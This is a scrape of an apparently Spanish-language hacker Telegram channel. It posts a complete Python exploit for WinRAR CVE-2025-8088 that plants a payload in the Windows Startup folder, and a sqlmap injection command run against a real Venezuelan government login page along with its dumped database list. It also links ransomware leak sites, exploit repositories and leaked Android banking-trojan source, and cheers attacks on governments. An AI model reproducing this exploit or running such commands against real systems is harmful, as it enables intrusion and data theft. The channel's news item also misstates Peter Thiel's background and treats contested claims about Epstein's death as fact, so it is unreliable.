FSEC INTEL ES 2.0 📡 🏴‍☠️ – Telegram
FSEC INTEL ES 2.0 📡 🏴‍☠️
547 subscribers
272 photos
27 videos
14 files
183 links
Inteligencia de Amenazas de Hackers para Hackers. 📡

Estamos de vuelta!!

X : https://x.com/FsecIntelEs
Download Telegram
Forwarded from Private Forum
🛸CVE-2025-8088 : WinRAR exploiting CVE-2025-8088 using ADS and path traversal
🪮Code :
import subprocess
import os
import argparse

def create_malicious_rar(output_file, decoy_file, traversal_levels=5):
"""
Creates a malicious RAR exploiting CVE-2025-8088 using ADS and path traversal.
"""
# Create payload content
payload_content = "@echo off\r\nstart calc.exe"
payload_path = "payload.bat"
with open(payload_path, 'w') as f:
f.write(payload_content)

# Create decoy if not provided
if not decoy_file:
decoy_file = "decoy.txt"
with open(decoy_file, 'w') as f:
f.write("Harmless decoy file.")

# Build traversal path with space for bypass
traversal = "/../ " * traversal_levels
ads_path = f"{os.path.basename(decoy_file)}:{traversal}/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/payload.bat"

# Add decoy to RAR
subprocess.run(["rar", "a", output_file, decoy_file], check=True)

# Add ADS payload with traversal (redirect payload content)
with open(payload_path, 'rb') as payload:
subprocess.run(["rar", "a", output_file, ads_path], stdin=payload, check=True)

# Clean up
os.remove(payload_path)
if decoy_file == "decoy.txt":
os.remove(decoy_file)

print(f"Malicious RAR created: {output_file}")

if __name__ == "__main__":
parser = argparse.ArgumentParser(denoscription="POC for CVE-2025-8088 WinRAR ADS Traversal")
parser.add_argument("--output", default="poc_8088.rar", help="Output RAR file")
parser.add_argument("--decoy", help="Path to decoy file (e.g., PDF)")
parser.add_argument("--levels", type=int, default=5, help="Traversal levels (4-8)")

args = parser.parse_args()
create_malicious_rar(args.output, args.decoy, args.levels)

🍀Github : https://github.com/search?q=CVE-2025-8088
Collection
Please open Telegram to view this post
VIEW IN TELEGRAM
😱8👍1👎1🔥1
Forwarded from Private Forum
This media is not supported in your browser
VIEW IN TELEGRAM
🛸CVE-2025-25256 : Fortinet FortiSIEM - unauthenticated OS Command Injection (RCE)
🪮PoC : https://github.com/watchtowrlabs/watchTowr-vs-FortiSIEM-CVE-2025-25256
Collection
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12👎1
Gobierno indio Hacked 🏴‍☠️ 🇮🇳

#fuckgob #india
🔥9
He estado jugando con un Exploit 0Day muy bonito regalado por los chicos de Scattered Spider alias Lapsus$, los chicos han estado muy activos este mes atacando Burgen King Brazil junto a la policia brasileña y en las ultimas semanas a estado amenazando al CEO de la empresa de ciberseguridad Crowdstrike por tirar informacion de sus servidores.

Recientemente publicaron un Exploit el cual permite subir ficheros al servidor victima sin ningún tipo de restricción, CVE-2025-31324 es el cve para el Exploit, les dejo el Github...

https://github.com/antichainalysis/sap-netweaver-0day-CVE-2025-31324

FUENTE:
https://news.1rj.ru/str/+vs8Sn8tCsrk1ZDk1

#exploit #rce #scattered #lapsus #github
15👏2
Se Filtra codigo fuente de Malware Bancario para Android 📡

Investigadores de hunt.io dieron con un servidor en el cual lograron obtener toda la infraestructura de ERMAC V30, un Malware Bancario dirigido a Usuario de Android, ERMAC tiene capacidades altamente peligrosas como la de asimilar y superponer mas de 700 aplicaciones bancarias capaz de robar usuarios y contraseñas, también el Malware es capaz de enviar SMS y realizar llamadas telefónicas.

https://hunt.io/blog/ermac-v3-banking-trojan-source-code-leak
https://github.com/vxunderground/MalwareSourceCode/tree/main/Android/Android.Ermac.3

#malware #leak #ermac #android #botnet
🔥13🥰41
Justicia Penal Militar y Policial Colombia golpeada por Ransomware 45TB exfiltrados 🇨🇴

Organización gubernamental colombiana encargada
de realizar seguimmientos y sanciones contra
faltas de miembros de las fuerzas publicas fue
pirateada por Gunra Ransomware una pandilla
relativamente nueva dentro de la escena del
Ransomware.

Al parecer la pandilla logro exfiltrar una gran
cantidad de ficheros los cuales llegaron a pesar
45TB, tambien se puedo observar otras victimas
latinas como ser: una farmaceutica argentina,
una aseguradora nicaragüense y un Ecommerce
brasileño.

FUENTE:
http://gunrabxbig445sjqa535uaymzerj6fp4nwc6ngc2xughf2pedjdhk4ad.onion/

#colombia #gunra #onion #fuckgob
🔥5
CEPHALUS 🔐

http://cephalus6oiypuwumqlwurvbmwsfglg424zjdmywfgqm4iehkqivsjyd.onion/


#ransomware #onion
2
Instituto Nacional de Higiene Venezuela | SQLI VUN 💣 🇻🇪

sqlmap --random-agent --risk=3 --level=5 --tamper=between,space2comment --url "https://siverc.inhrr.gob.ve/user/includes/login_op.php" --data="usuario_login=admin&clave_login=admmin&login=1" --method POST --dbs --delay 5 --batch --threads=10   


DBs

available databases [3]:
[*] information_schema
[*] pg_catalog
[*] public


#exploit #sqli #fuckgob #venezuela
🔥61👍1
Jeffrey Epstein estaba interesado en la industria del Ciberespionaje según correos filtrados 📡

Una serie de correos filtrados por el grupo Hacktivista propalestina Handala dieron a conocer el interés de Epstein por incursionar en el mundo del espionaje cibernetico, según los correos filtrados el multimillonario se reunió con el exministro israeli Ehud Barak y con Peter Thiel ex Director de Inteligencia de Señales israeli y fundador de Palantir una empresa de minería de datos y desarrollo de Software orientado al análisis de datos.

En los correos también se puede ver como Epstein trataba de entrar en el mundo de la ciberinteligencia tanto en los EEUU y Europa he incluso Rusia, pues como es obvio sus intentos se vieron frustrados gracias a su juicio y posterior asesinato.

FUENTES:
https://handala-hack.to/israel-prime-minister-emails/
https://ddosecrets.com/article/ehud-barak-emails
https://reason.com/2025/08/27/inside-jeffrey-epsteins-spy-industry-connections/

#palantir #epstein #vigilancia
5🤬1🤨1